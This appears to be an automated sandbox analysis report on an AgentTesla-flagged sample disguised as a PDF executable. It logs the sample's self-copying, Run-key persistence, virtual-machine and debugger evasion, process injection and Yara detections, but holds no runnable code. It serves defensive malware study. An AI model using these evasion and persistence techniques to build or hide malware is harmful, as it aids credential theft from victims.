                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe Code function: 8_2_063AB58D push es; ret
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe Code function: 8_2_063A5187 push edi; retn 0000h
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Code function: 18_2_05FE2678 pushad ; retf
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Code function: 19_2_05632678 pushad ; retf
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Code function: 24_2_04D26BC0 push 5D5F5E5Bh; ret
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Code function: 24_2_05D3E431 push esi; iretd
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Code function: 24_2_05D35187 push edi; retn 0000h
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Code function: 24_2_05D3AA1C push es; iretd
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Code function: 24_2_06383697 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Code function: 24_2_06386FBC pushad ; retf
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Code function: 24_2_063833C9 push ecx; iretd
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Code function: 24_2_0638B1F6 push cs; ret
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Code function: 24_2_06431B98 push esi; ret
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe File created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NewApp

                      Hooking and other Techniques for Hiding and Protection:

                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe File opened: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe File opened: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (20 identical entries)
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Process information set: NOOPENFILEERRORBOX (137 identical entries)
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (20 identical entries)
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Process information set: NOOPENFILEERRORBOX (17 identical entries)
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (20 identical entries)

                      Malware Analysis System Evasion:

                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe Window / User API: threadDelayed 3080
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe Window / User API: threadDelayed 1547
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe Window / User API: threadDelayed 8247
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Window / User API: threadDelayed 455
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Window / User API: threadDelayed 2903
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Window / User API: threadDelayed 399
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Window / User API: threadDelayed 2121
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Window / User API: threadDelayed 1169
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Window / User API: threadDelayed 8261
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Window / User API: threadDelayed 1524
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe TID: 7044 Thread sleep count: 3080 > 30
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe TID: 7044 Thread sleep count: 223 > 30 (2 identical entries)
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe TID: 6180 Thread sleep time: -17524406870024063s >= -30000s
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe TID: 6172 Thread sleep count: 1547 > 30
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe TID: 6172 Thread sleep count: 8247 > 30
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe TID: 6180 Thread sleep count: 48 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 5832 Thread sleep count: 455 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 5832 Thread sleep count: 2903 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 5832 Thread sleep count: 399 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 4696 Thread sleep count: 2121 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 4696 Thread sleep count: 1169 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 6124 Thread sleep time: -25825441703193356s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 6972 Thread sleep count: 8261 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 6972 Thread sleep count: 1524 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 6124 Thread sleep count: 43 > 30
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor (2 identical entries)
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor (2 identical entries)
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (3 identical entries)
                      Source: NewApp.exe, 00000018.00000002.923839104.0000000006230000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.705986735.00000000051E0000.00000002.00000001.sdmp, A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.918554184.0000000005F50000.00000002.00000001.sdmp, WerFault.exe, 0000000B.00000002.703525513.0000000004E80000.00000002.00000001.sdmp, NewApp.exe, 00000012.00000002.846768409.00000000055D0000.00000002.00000001.sdmp, NewApp.exe, 00000013.00000002.847227235.0000000004B80000.00000002.00000001.sdmp, NewApp.exe, 00000018.00000002.918863074.00000000058E0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: WerFault.exe, 0000000B.00000003.700535576.0000000004BD4000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886267678.0000000004BF4000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.705986735.00000000051E0000.00000002.00000001.sdmp, A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.918554184.0000000005F50000.00000002.00000001.sdmp, WerFault.exe, 0000000B.00000002.703525513.0000000004E80000.00000002.00000001.sdmp, NewApp.exe, 00000012.00000002.846768409.00000000055D0000.00000002.00000001.sdmp, NewApp.exe, 00000013.00000002.847227235.0000000004B80000.00000002.00000001.sdmp, NewApp.exe, 00000018.00000002.918863074.00000000058E0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.705986735.00000000051E0000.00000002.00000001.sdmp, A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.918554184.0000000005F50000.00000002.00000001.sdmp, WerFault.exe, 0000000B.00000002.703525513.0000000004E80000.00000002.00000001.sdmp, NewApp.exe, 00000012.00000002.846768409.00000000055D0000.00000002.00000001.sdmp, NewApp.exe, 00000013.00000002.847227235.0000000004B80000.00000002.00000001.sdmp, NewApp.exe, 00000018.00000002.918863074.00000000058E0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: WerFault.exe, 0000000B.00000002.703491956.0000000004C80000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697430851.00000000010DF000.00000004.00000020.sdmp, A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.705986735.00000000051E0000.00000002.00000001.sdmp, A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.918554184.0000000005F50000.00000002.00000001.sdmp, WerFault.exe, 0000000B.00000002.703525513.0000000004E80000.00000002.00000001.sdmp, NewApp.exe, 00000012.00000002.846768409.00000000055D0000.00000002.00000001.sdmp, NewApp.exe, 00000013.00000002.847227235.0000000004B80000.00000002.00000001.sdmp, NewApp.exe, 00000018.00000002.918863074.00000000058E0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information queried: ProcessInformation

                      Anti Debugging:

                      Contains functionality to hide a thread from the debugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Code function: 0_2_00E992E0 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,00E99F4F,00000000,00000000
                      Hides threads from debuggers
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Process queried: DebugPort
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Process queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Process queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Process queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Process queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Process queried: DebugPort
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Code function: 8_2_067B8460 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Memory written: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Memory written: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Memory written: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Process created: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Process created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Process created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.914746965.00000000017D0000.00000002.00000001.sdmp, NewApp.exe, 00000018.00000002.915456140.00000000012F0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.914746965.00000000017D0000.00000002.00000001.sdmp, NewApp.exe, 00000018.00000002.915456140.00000000012F0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.914746965.00000000017D0000.00000002.00000001.sdmp, NewApp.exe, 00000018.00000002.915456140.00000000012F0000.00000002.00000001.sdmp | Binary or memory string: Progman
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.914746965.00000000017D0000.00000002.00000001.sdmp, NewApp.exe, 00000018.00000002.915456140.00000000012F0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Queries volume information: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Queries volume information: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Queries volume information: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Queries volume information: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Queries volume information: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Queries volume information: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      Yara detected AgentTesla
                      Source: Yara match | File source: 0000001F.00000002.811192969.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000002.833553760.00000000042AC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.702719345.000000000442A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000002.915676599.0000000002898000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.915637033.0000000002DFA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.912000692.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000002.911999717.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000013.00000002.832293360.000000000380F000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: A4-058000200390-10-14_REV_pdf.exe PID: 7040, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: NewApp.exe PID: 2092, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: A4-058000200390-10-14_REV_pdf.exe PID: 1572, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: NewApp.exe PID: 6416, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: NewApp.exe PID: 1216, type: MEMORY
                      Source: Yara match | File source: 18.2.NewApp.exe.42f16b0.7.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.NewApp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.A4-058000200390-10-14_REV_pdf.exe.4470150.8.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 18.2.NewApp.exe.42ac090.6.unpack, type: UNPACKEDPE
